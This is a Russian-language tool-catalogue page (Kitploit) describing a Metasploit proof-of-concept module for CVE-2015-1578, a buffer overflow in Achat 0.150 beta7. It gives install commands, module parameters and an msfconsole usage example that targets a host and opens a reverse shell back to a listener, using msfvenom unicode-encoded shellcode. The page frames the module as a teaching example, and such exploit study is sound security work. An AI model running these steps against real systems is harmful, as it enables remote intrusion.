Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2015-1578-PoC-Metasploit — Это proof-of-concept эксплойт модуля Metasploit для CVE-2015-1578, уязвимости переполнения буфера в Achat 0.150 beta7 на Windows. Эксплуатация приводит к удаленному выполнению кода через поддельный UDP-пакет. | Kitploit
Инструменты/GitHubGitHub/yaldobaoth/cve-2015-1578-poc-metasploit
Фреймворки для пентестаФреймворки для эксплойтовАнализ уязвимостейЭксплуатацияШелл-кодИнструмент Удаленного ДоступаГенерация ШеллкодаРазработка Полезной НагрузкиЭксплуатация Бинарных Файлов
GitHubyaldobaoth/cve-2015-1578-poc-metasploit

CVE-2015-1578-PoC-Metasploit

Это proof-of-concept эксплойт модуля Metasploit для CVE-2015-1578, уязвимости переполнения буфера в Achat 0.150 beta7 на Windows. Эксплуатация приводит к удаленному выполнению кода через поддельный UDP-пакет.

Репозиторий
131 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2015-1578 Модуль Metasploit

Обзор

Это модуль Metasploit для CVE-2015-1578, уязвимости переполнения буфера в Achat 0.150 beta7 на Windows. Эксплуатация приводит к удаленному выполнению кода с помощью специально подготовленного UDP-пакета.

Назначение

Этот модуль предназначен для того, чтобы служить чистым, минимальным и хорошо структурированным примером разработки эксплойтов Metasploit. Он демонстрирует:

  • Динамическая генерация шелл-кода в кодировке Unicode с помощью msfvenom
  • Ручная инъекция полезной нагрузки (обход встроенного кодировщика полезной нагрузки Metasploit)
  • Простой механизм доставки на основе UDP
  • Интеграция в Metasploit Framework с помощью загрузки пользовательских модулей

Видеоурок

Video Tutorial

Зависимости

  • Metasploit Framework
  • msfvenom в вашем
$PATH

Особенности

  • Использует msfvenom для генерации полезной нагрузки с кодировкой x86/unicode_mixed и пользовательскими запрещенными символами
  • Избегает встроенной системы кодирования полезной нагрузки Metasploit для обхода ограничений кодировщика

Установка

root@kitploit:~
./install.sh

Затем запустите Metasploit и выполните:

root@kitploit:~
reload_all
use exploit/windows/yaldobaoth/achat_bof

Параметры

  • RHOSTS – IP-адрес цели (обязательно)
  • LHOST – IP-адрес локального хоста для обратного шелла (обязательно)
  • LPORT – Локальный порт для обратного шелла (по умолчанию: 4444)
  • RPORT – Удаленный UDP-порт на цели (по умолчанию: 9256)

Пример использования

root@kitploit:~
msfconsole
use exploit/windows/yaldobaoth/achat_bof
set RHOSTS 10.10.10.74
set LHOST 10.10.16.7
set LPORT 9393
run

Это приведет к:

  • Генерация совместимой с Unicode полезной нагрузки обратного шелла с помощью msfvenom
  • Внедрение в уязвимый буфер Achat через UDP
  • Прослушивание шелла на указанном LHOST:LPORT
Скачать инструмент